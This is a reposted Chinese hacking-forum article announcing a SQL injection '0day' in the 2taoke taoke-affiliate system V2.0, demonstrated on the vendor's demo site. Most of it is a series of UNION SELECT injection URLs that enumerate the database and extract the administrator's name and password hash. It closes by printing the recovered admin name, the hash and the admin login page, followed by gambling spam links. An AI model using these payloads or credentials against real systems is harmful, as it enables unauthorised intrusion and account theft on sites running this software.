歡迎來到 黑吧安全網 聚焦網絡安全前沿資訊,精華內容,交流技術心得!

愛淘客淘寶客系統 V2.0 0day

來源:本站轉載 作者:佚名 時間:2010-05-14 TAG: 我要投稿
以官方演示版(http://demo.2taoke.com)為例:此腳本程序存在一個注入漏洞,考慮到官方,具體哪個點暫時不說。 構造下面注入語句: 





?id=-999.9%20UNION%20ALL%20SELECT%20(SELECT%20concat(0x7e,0x27,count(table_name),0x27,0x7e)%20FROM%20information_schema.tables%20WHERE%20table_schema=0x3274616F6B655F64656D6F),2,3-- 




?id=-999.9%20UNION%20ALL%20SELECT%20(select%20concat(0x7e,0x27,Hex(cast(group_concat(table_name)%20as%20char)),0x27,0x7e)%20FROM%20information_schema.tables%20Where%20table_schema=0x3274616F6B655F64656D6F),2,3-- 




?id=-999.9%20UNION%20ALL%20SELECT%20(SELECT%20concat(0x7e,0x27,count(column_name),0x27,0x7e)%20FROM%20information_schema.columns%20WHERE%20table_schema=0x3274616F6B655F64656D6F%20AND%20table_name=0x3274616F6B655F61646D696E),2,3-- 




?id=-999.9%20UNION%20ALL%20SELECT%20(select%20concat(0x7e,0x27,Hex(cast(group_concat(column_name)%20as%20char)),0x27,0x7e)%20FROM%20information_schema.columns%20Where%20table_schema=0x3274616F6B655F64656D6F%20AND%20table_name=0x3274616F6B655F61646D696E),2,3-- 




?id=-999.9%20UNION%20ALL%20SELECT%20(SELECT%20concat(0x7e,0x27,count(*),0x27,0x7e)%20FROM%202taoke_demo.2taoke_admin),2,3-- 




?id=-999.9%20UNION%20ALL%20SELECT%20(SELECT%20concat(0x7e,0x27,Hex(cast(2taoke_admin.adminname%20as%20char)),0x27,0x7e)%20FROM%202taoke_demo.2taoke_admin%20LIMIT%200,1)%20,2,3-- 




?id=-999.9%20UNION%20ALL%20SELECT%20(SELECT%20concat(0x7e,0x27,Hex(cast(2taoke_admin.adminpass%20as%20char)),0x27,0x7e)%20FROM%202taoke_demo.2taoke_admin%20LIMIT%200,1)%20,2,3-- 




最終管理員用戶名:2taoke 密碼:59f1d6b20e62c684d0f9b566ef1643bd 后臺:http://demo.2taoke.com/admin/admin_login.php 
【聲明】:黑吧安全網(http://www.650547.live)登載此文出于傳遞更多信息之目的,并不代表本站贊同其觀點和對其真實性負責,僅適于網絡安全技術愛好者學習研究使用,學習中請遵循國家相關法律法規。如有問題請聯系我們,聯系郵箱[email protected],我們會在最短的時間內進行處理。
  • 最新更新
    • 相關閱讀
      • 本類熱門
        • 最近下載
        安徽快3自由的百科 000851股票分析 福建体彩31选7走势图i 广西快乐十分好运遗漏 贵州快三怎么下载 青海体彩十一选五 甘肃11选5哪里购买 官方彩票手机投注网站 新希望股票 北京快3玩法 pk10开奖数据